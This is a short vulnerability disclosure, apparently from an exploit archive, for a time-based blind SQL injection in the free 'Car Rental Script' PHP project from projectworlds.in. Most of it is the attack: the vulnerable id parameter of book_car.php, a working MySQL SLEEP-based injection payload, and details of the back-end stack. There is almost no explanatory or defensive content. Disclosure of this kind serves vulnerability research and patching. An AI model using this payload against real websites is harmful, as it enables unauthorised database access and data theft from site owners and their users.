Car Rental Script SQL Injection

Car Rental Script from projectworlds.in suffers from a remote SQL injection vulnerability. Versions are not provided with this software currently.


MD5 | 2e01a55b635c9bfb17fe3f6b96de3983

====================================================================
Car Rental Script - Time-based blind SQL injection
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date: : 8/8/2020
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP
####################################################################


===[ Exploit ]===

[*] SQL injection
=================================

https://localhost/testing/book_car.php?id='[payload<https://localhost/testing/book_car.php?id='%5bpayload>]


Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu


the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43

Related Posts